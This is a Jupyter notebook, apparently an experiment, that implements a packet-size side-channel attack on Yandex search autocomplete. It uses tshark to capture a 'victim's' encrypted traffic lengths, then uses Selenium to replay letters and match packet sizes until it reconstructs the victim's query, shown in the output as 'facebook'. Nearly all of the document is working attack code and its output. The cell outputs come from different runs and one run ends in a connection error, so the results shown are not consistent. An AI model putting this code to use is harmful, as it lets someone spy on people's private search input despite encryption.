In [36]:
from bs4 import BeautifulSoup
from struct import *
import urllib.request
import warnings
warnings.filterwarnings('ignore')
import pandas as pd
import numpy as np
import os
import sys
import time
import threading
import re
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from subprocess import STDOUT, PIPE, Popen, check_output, check_call, call
import socket
import netifaces as ni
import string

# get local ip address
ni.ifaddresses('en0')
myip = ni.ifaddresses('en0')[2][0]['addr']

# get keyword dictionary 
K=list()
with open('keywords.txt','r') as f:
    for line in f:
        if len(line)>3:
            K.append(line[:-1])

def terminal(cmd):
    os.system(cmd)

def tshark(duration,filename):
    cmd="""tshark -Y "((ip.dst_host == """+myip+""" && ip.src_host ==213.180.204.62  )|| (ip.dst_host == 213.180.204.62&& ip.src_host == """+myip+"""  ) )&&tcp.port == 443 && ssl.record.version == 0x0303" -T fields -e frame.time -e ip.src -e ip.dst -e frame.len -e _ws.col.Info -a duration:"""+str(duration)+""" > """ + filename
    t=threading.Thread(target=terminal,args=([cmd]))
    t.start()
    return t

def enterALetter(letter,inputElement):
    ts2=tshark(3,'dump1.csv')
    time.sleep(1)
    inputElement.send_keys(letter)
    ts2.join()
    T2=readDump('dump1.csv')
    T2len=list(T2['Length'])
    return T2len


def enterAWord(wrd,inputElement):
    for c in wrd:
        inputElement.send_keys(c)
        time.sleep(0.2)

def enterAllAlphabet(inputElement):
   
    ts2=tshark(10,'dump1.csv')  #20
    time.sleep(3)
    alphabet=list(string.ascii_lowercase)+[' ']
    for c in alphabet:
        inputElement.send_keys(c)
        bs=Keys.BACKSPACE
        time.sleep(0.1) #0.2
        inputElement.send_keys(bs)
        time.sleep(0.1) #0.2
    ts2.join()
    T2=readDump('dump1.csv')
    T2len=list(T2['Length'])
    return T2len

def clearSearch(inputElement):
    inputElement.clear()
    
def readDump(file):
    T=pd.read_csv(file,delimiter='\t',names=['Time','Source','Destination','Length','Info'])
    #select=np.logical_or(T['Info']=='Application Data', T['Info']=='Application Data, Application Data')
    select=np.logical_and(T['Source']=="213.180.204.62",T['Info']=='Application Data, Application Data')
    #select=np.logical_and(select,T['Length']>1000)
    return T.loc[select]


def deleteContent(fName):
    with open(fName, "w"):
        pass
    
def findMatches(aList,packSize):
    returnList=list()
    if (len(aList) < 27):
        raise ValueError('Your list size (' + str(len(aList)) + ')' + 'less than 27, func:findMatches')
    elif (len(aList) > 27):
       
         raise ValueError('Your list size (' + str(len(aList)) + ')' + 'greater than 27, func:findMatches')
        
    for i in range(0,len(aList)):
        #print(aList[i])
        if((packSize >= (aList[i]-2) and (packSize <= (aList[i]+3)))):
            returnList.append(i)
    return returnList

def openYandex():
    driver=webdriver.Chrome()
    driver.get("https://yandex.com")
    time.sleep(2)
    inputElement = driver.find_element_by_id("text")
    time.sleep(1)
    driver_inputelement=list()
    driver_inputelement.append(driver)
    driver_inputelement.append(inputElement)
    return driver_inputelement


#### Start TSHARK to Catch the Data Packets of Victim  

In [37]:

deleteContent('dump0.csv')
deleteContent('dump1.csv')
duration=40  # assume 10 sec enough to catch userinput 
ts=tshark(duration,'dump0.csv')  # start tshark for 'duration' sec
time.sleep(3)
#enterAWord("facebook") # ENTER A WORD
print("Victim input detection is ON")
call(['echo', 'Victim input detection is ON!!!'])
ts.join()
#while (ts.isAlive()):
T=readDump('dump0.csv')
print(list(T['Length']))
deleteContent('dump0.csv')



Victim input detection is ON
[1189, 1231, 1213, 1258, 1258, 1269, 1269, 1264]


### Open browser where packet size('A') == 1179



In [38]:
# PACKAGE SIZES VARY ~2,3 BYTES
# 1177, ... , 1182 -> 1182 AND 1177 REALLY RARE CASES,
# OVERALL 1179-2 TO 1179 + 3 
# LUCKILY IF ONE LETTER CHANGES 1 BYTE, ALL OF THE OTHER LETTERS CHANGE 1 BYTE

# OPEN GOOGLE CHROME UP UNTIL A==1179
driver_inputelement = []
sizeA = [0]
while(1):
    driver_inputelement = openYandex()
    inputElement = driver_inputelement[1]
    sizeA=enterALetter('a', inputElement )
    driver=driver_inputelement[0]
    print(sizeA)
    if(sizeA[0]  != 1179):
        driver.close()
    else:
        break  
    

clearSearch(inputElement)
print("Browser Ready!!!")
call(['echo', 'Browser Ready!!!'])



[1179]
Browser Ready!!!


0

### Start Deciphering Process


In [39]:
call(['echo', 'Deciphering Process Starting...'])
time.sleep(2)

tree=[]
topofTree={'char':'null', 'parent':-1, 'degree':0, 'flag':1} #flag shows if node is active or removed
# topofTree['parent']
tree.append(topofTree)
#tree[0]['parent']

userInput=list(T['Length'])
userInputSize=len(userInput)
i = 0
alphabet=list(string.ascii_lowercase)+[' ']
currentDegree=0

while(i < userInputSize):
    currentPackSize = userInput[i]
    inserted=0 # check if new node inserted or not to increment degree
    newNodesOfTree=[] #new Nodes to be inserted into the tree at the end of 26 letter type process
    #if first letter, directly type all letters, insert matches
    if( i==0 ):
        i = i + 1
        #inputElement = openYandex() 
        letterPackSizes = enterAllAlphabet(inputElement) #type 26 letter
        print('Letter Package Sizes',end=' ') 
        print(letterPackSizes)
        #insert matches to the tree
        indices = findMatches(letterPackSizes,userInput[0])
        print('First letter options: ',end='')
                 
        for x in range(0,len(indices)):
            print( alphabet[ indices[x] ],end=' ' )
            newNode = {'char':alphabet[indices[x]],'parent':0,'degree':1,'flag':1}
            tree.append(newNode)
            #print(alphabet[indices[x]])
        currentDegree += 1
        print('')
        continue
        
    # number of element thats have i degree
    rootNum=len([t for t in range(len(tree)) if tree[t]['degree']==currentDegree])

    for j in range (rootNum,0,-1):
        newNode=tree[len(tree)-j]
        #if(newNode['flag']==0) continue # if removed node no need to go on
        toBeTypedBefore=[]
        currentNode=newNode
        print('\nCurrentNode: ',end=' ')
        print(currentNode)
        
        while( currentNode['parent'] != -1 ):
            toBeTypedBefore.append(currentNode['char']) # bottom one inserted
            currentNode=tree[currentNode['parent']]
        currentNode=newNode
        toBeTypedBefore=toBeTypedBefore[::-1]
        print("toBeTypedBefore:" + ''.join(toBeTypedBefore))  #type reverse of toBeTypedBefore
        
        clearSearch(inputElement)  #clear search engine
        enterAWord(toBeTypedBefore,inputElement)        #type toBeTyped
        letterPackSizes=enterAllAlphabet(inputElement) #type 27 letter after that 
        
        #print("letterPackSizes:")  #type reverse of toBeTypedBefore
        #print(letterPackSizes)
        letterPackSizesTemp=[]
        for k in range (0,len(letterPackSizes),2): #remove repetitive package sizes
            letterPackSizesTemp.append(letterPackSizes[k])
        letterPackSizes=letterPackSizesTemp
            
        indices = findMatches(letterPackSizes,userInput[i])
        
        if(len(indices) == 0):
            print('Next letter does not exist')
        else:  
            print('next letter options:',end='')
            for x in range(0,len(indices)):
                print( alphabet[indices[x]],end=' ')
        print('')
        
        tempNode=[]
        
        if(len(indices)==0): #if there is no match kill that path
          # while( currentNode['parent'] != -1 ): #remove recursively
            tempNode=tree[currentNode['parent']]
            print(repr(currentNode) + '-> flag set to 0:')
            index=tree.index(currentNode) #find location of currentnode
            tree[index]['flag']=0
            currentNode=tempNode
        else :#else insert matches to that node
        
            print('Number of added letters: ' + repr(len(indices)))
            if(len(indices) == 26):
                print('SORRY ADMIN... NO MORE REDUCTION in this path ')
                continue
            else:  
                inserted=1
                for x in range(0,len(indices)):
                    newNode={'char':alphabet[indices[x]],'parent':tree.index(currentNode),'degree':(currentDegree+1),'flag':1}
                    newNodesOfTree.append(newNode)
                   # print("newNodesOfTree:")
                   # print(newNodesOfTree)
    
            
   
    if(inserted):
        currentDegree=currentDegree+1
    
    print('Number of Nodes:' + repr(len(newNodesOfTree)) +'\n')
    tree=tree+newNodesOfTree
    
    
    
    i=i+1 
print('Process is done!!!')
call(['echo', 'Process is done!!!'])




Letter Package Sizes [1179, 1190, 1196, 1188, 1173, 1183, 1243, 1190, 1178, 1202, 1166, 1185, 1171, 1218, 1210, 1179, 1179, 1177, 1192, 1188, 1197, 1201, 1256, 1176, 1246, 1172, 478]
First letter options: b d h t 

CurrentNode:  {'char': 'b', 'parent': 0, 'degree': 1, 'flag': 1}
toBeTypedBefore:b
next letter options:u 
Number of added letters: 1

CurrentNode:  {'char': 'd', 'parent': 0, 'degree': 1, 'flag': 1}
toBeTypedBefore:d
next letter options:i o 
Number of added letters: 2

CurrentNode:  {'char': 'h', 'parent': 0, 'degree': 1, 'flag': 1}
toBeTypedBefore:h
next letter options:e 
Number of added letters: 1

CurrentNode:  {'char': 't', 'parent': 0, 'degree': 1, 'flag': 1}
toBeTypedBefore:t
next letter options:h i 
Number of added letters: 2
Number of Nodes:6


CurrentNode:  {'char': 'u', 'parent': 1, 'degree': 2, 'flag': 1}
toBeTypedBefore:bu
Next letter does not exist

{'char': 'u', 'parent': 1, 'degree': 2, 'flag': 1}-> flag set to 0:

CurrentNode:  {'char': 'i', 'parent': 2, 'deg

ConnectionRefusedError: [Errno 61] Connection refused

### Print Tree, Show possible inputs

In [33]:

ix=[t for t in range(len(tree)) if tree[t]['flag']==0]
#print(ix)
   
for t in range(len(ix)):
    print('\nPath ' + repr(t))
    toBePrinted=[]
    node=(tree[ix[t]])
    while(node['parent'] != -1):
        #print(node)
        toBePrinted.append(node)
        node=tree[node['parent']]
    for k in range (len(toBePrinted),0,-1):
        print(toBePrinted[k-1])
#Final Paths

print('\nDeciphering...')
print('Victim typed...')

ix=[t for t in range(len(tree)) if tree[t]['degree']==(currentDegree)]

# find nodes which satisfy nodes.degree == currentdegree 
for t in range(len(ix)):
    print('\nPath ' + repr(t))
    toBePrinted=[]
    node=(tree[ix[t]])
    while(node['parent'] != -1):
        toBePrinted.append(node)
        node=tree[node['parent']]
    for k in range (len(toBePrinted),0,-1):
        print(toBePrinted[k-1])




Path 0
{'char': 'l', 'parent': 0, 'degree': 1, 'flag': 0}

Path 1
{'char': 'f', 'parent': 0, 'degree': 1, 'flag': 1}
{'char': 'a', 'parent': 1, 'degree': 2, 'flag': 1}
{'char': 'c', 'parent': 3, 'degree': 3, 'flag': 1}
{'char': 'e', 'parent': 4, 'degree': 4, 'flag': 1}
{'char': 's', 'parent': 5, 'degree': 5, 'flag': 0}

Deciphering...
Victim typed...

Path 0
{'char': 'f', 'parent': 0, 'degree': 1, 'flag': 1}
{'char': 'a', 'parent': 1, 'degree': 2, 'flag': 1}
{'char': 'c', 'parent': 3, 'degree': 3, 'flag': 1}
{'char': 'e', 'parent': 4, 'degree': 4, 'flag': 1}
{'char': 'b', 'parent': 5, 'degree': 5, 'flag': 1}
{'char': 'o', 'parent': 6, 'degree': 6, 'flag': 1}
{'char': 'o', 'parent': 8, 'degree': 7, 'flag': 1}
{'char': 'k', 'parent': 9, 'degree': 8, 'flag': 1}


In [18]:
a=[]
a.append(['a',0,0])
a.append(['e',1,0])
a

[['a', 0, 0], ['e', 1, 0]]